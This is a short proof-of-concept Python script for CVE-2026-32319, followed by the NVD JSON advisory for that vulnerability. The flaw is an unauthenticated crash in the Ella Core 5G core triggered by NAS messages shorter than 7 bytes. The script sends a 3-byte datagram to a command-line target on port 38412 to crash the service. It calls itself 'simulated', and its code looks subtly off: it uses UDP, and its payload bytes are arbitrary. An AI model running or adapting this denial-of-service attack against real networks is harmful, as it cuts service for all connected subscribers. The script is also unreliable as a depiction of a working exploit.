CVE-2026-32319

#!/usr/bin/env python3 """ CVE-2026-32319 PoC - Ella Core malformed NAS message DoS Note: This is a simulated PoC for educational/research purposes """ import socket import struct def create_malformed_nas_message(): """Create a malformed NAS message with length < 7 bytes""" # Malformed integrity protected NAS message # Less than 7 bytes to trigger panic nas_message = b'\x00\x01\x02' return nas_message def send_exploit(target_ip, target_port=38412): """ Send malformed NAS message to trigger DoS in Ella Core """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) malformed_msg = create_malformed_nas_message() print(f"[*] Sending malformed NAS message ({len(malformed_msg)} bytes)") print(f"[*] Target: {target_ip}:{target_port}") sock.sendto(malformed_msg, (target_ip, target_port)) print("[+] Malformed message sent") print("[!] Target should crash due to panic") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 38412 send_exploit(target, port)

{"cve": {"id": "CVE-2026-32319", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:42.297", "lastModified": "2026-03-19T13:45:33.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ella Core is a 5G core designed for private networks. Prior to 1.5.1, Ella Core panics when processing a malformed integrity protected NGAP/NAS message with a length under 7 bytes. An attacker able to send crafted NAS messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. This vulnerability is fixed in 1.5.1."}, {"lang": "es", "value": "Ella Core es un núcleo 5G diseñado para redes privadas. Antes de 1.5.1, Ella Core entra en pánico al procesar un mensaje NGAP/NAS malformado y protegido por integridad con una longitud inferior a 7 bytes. Un atacante capaz de enviar mensajes NAS manipulados a Ella Core puede colapsar el proceso, causando una interrupción del servicio para todos los suscriptores conectados. No se requiere autenticación. Esta vulnerabilidad está corregida en 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.1", "matchCriteriaId": "187BCA62-CD29-487C-B2AE-AEEA54452188"}]}]}], "references": [{"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-m9pm-w3gv-c68f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}